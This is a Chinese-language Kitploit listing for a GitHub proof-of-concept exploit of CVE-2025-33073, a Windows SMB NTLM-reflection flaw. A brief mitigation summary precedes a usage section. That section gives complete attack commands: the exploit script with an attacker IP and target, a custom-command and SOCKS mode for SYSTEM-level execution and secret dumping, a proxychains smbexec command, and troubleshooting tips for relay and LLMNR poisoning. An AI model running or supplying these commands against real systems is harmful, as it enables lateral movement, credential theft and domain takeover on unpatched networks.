Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Blackash-CVE-2025-33073 — CVE-2025-33073 | Kitploit
工具/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
漏洞分析漏洞利用横向移动渗透测试命令与控制红队Payload 开发
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-33073

查看仓库
9个月前尚未审核

✨ CVE-2025-33073: Windows SMB 远程代码执行漏洞 🚨

🔥 高危:经身份验证的远程代码执行 🔥 Windows SMB 客户端中的访问控制不当 (CWE-284)


🛡️ 核心信息一览

方面详细信息
CVSS v3.1 评分8.8(高危) 🔥
受影响系统Windows 10, 11, Server 2012–2025(所有版本) 💻
披露日期2025年6月10日 📅(已在 2025年6月补丁星期二 中修复)
利用情况已在野外被积极利用 😱
于 2025年10月21日 加入 CISA KEV
攻击向量网络(已认证) 🌐
影响SYSTEM 级代码执行 👑
通过 Kerberos 中继进行横向移动
绕过NTLM 反射缓解措施 ⚡

🛠️ 立即缓解措施

  1. 立即修补! 🔧
    → 应用 Microsoft 更新(例如 KB5060998)
    → Microsoft 更新指南 🔗

  2. 启用 SMB 签名 ✍️
    → 在 所有客户端和服务器 上强制执行
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. 限制 NTLM 🚫
    → 尽可能阻止 NTLM
    → 使用 EDR 工具监控中继尝试

  4. 自动化修复? 🤖
    → 使用 Vicarius vRx 或自定义脚本进行批量修复


⚠️ 为何重要

  • 绕过传统的 NTLM 保护 🛑
  • 即使 未强制 SMB 签名也能生效
  • 在配置错误的 AD 环境中实现 完全域接管 🏰

截至 2025年11月15日的状态:
✅ 已修复
❌ 在未修补系统中仍被利用
🔔 CISA 截止日期:2025年11月10日 ⏰


⚠️ 使用示例

GUI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

自定义命令 可以执行自定义命令,而不是运行 secretsdump。

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS 为了在以 SYSTEM 身份建立有效连接后更隐蔽地执行命令,此处 --target 和 --target-ip 应相同。

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

还可以通过 proxychains 运行自定义命令,而不是转储 SAM。

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

无需 DNS 的手动利用

如果你与该设备位于同一广播域,并且该设备容易受到 LLMNR 投毒攻击,那么无需注册 DNS 记录即可利用该设备。

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

故障排查:

  • 我有时发现攻击不生效,因为攻击使用了主机名,导致 Kali 需要进行 DNS 查询。如果 Kali 未使用该 DNS 服务器,或者你从 impacket-ntlmrelayx 收到 '/ FAILED' 消息,请尝试将该主机添加到你的 /etc/hosts 文件中。这应该能使攻击生效。

  • 如果使用 IP,攻击应该可以生效。有时多次运行会从失败变为成功。到目前为止,还不完全清楚为什么会发生这种情况。我认为这与网络有关。

  • 使用 -M 或 --method 尝试其他强制方法。


Wireshark:

发生本地 NTLM 身份验证

455252866-0a3fe643-2d52-427a-91f2-991770732f62

未发生本地 NTLM 身份验证,导致尝试失败

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

注意事项:

  • xterm 允许使用鼠标中键进行复制和粘贴。
  • DNS 记录也应该让客户端知道,在某些情况下这可能需要更多时间。所谓更多时间,是指给它几分钟。
  • 这只是一个 PoC,意味着尚未尝试绕过 AV/EDR。请自行承担使用风险。

不要再等待——今天就修补! 🛑
你网络的安全取决于此。 💪

下载工具